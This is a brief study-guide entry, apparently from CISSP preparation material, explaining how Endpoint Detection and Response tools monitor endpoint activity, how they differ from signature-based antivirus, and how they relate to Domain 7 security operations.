Endpoint Detection and Response (EDR) solutions continuously monitor activity on endpoints, recording process activity, file system changes, network connections, and registry modifications. When suspicious behavior occurs, EDR platforms alert analysts and provide the telemetry needed to investigate and contain the threat.
Traditional antivirus relied on signature matching to identify known malware. EDR takes a behavioral approach, flagging activity that looks like an attack even when the specific malware is new or customized.
CISSP Relevance
EDR supports Domain 7 (Security Operations) monitoring and incident response capabilities. CISSP candidates must understand how endpoint monitoring integrates with SIEM platforms and how EDR capabilities support both detection and forensic investigation.
External reference: CISA Endpoint Security Guide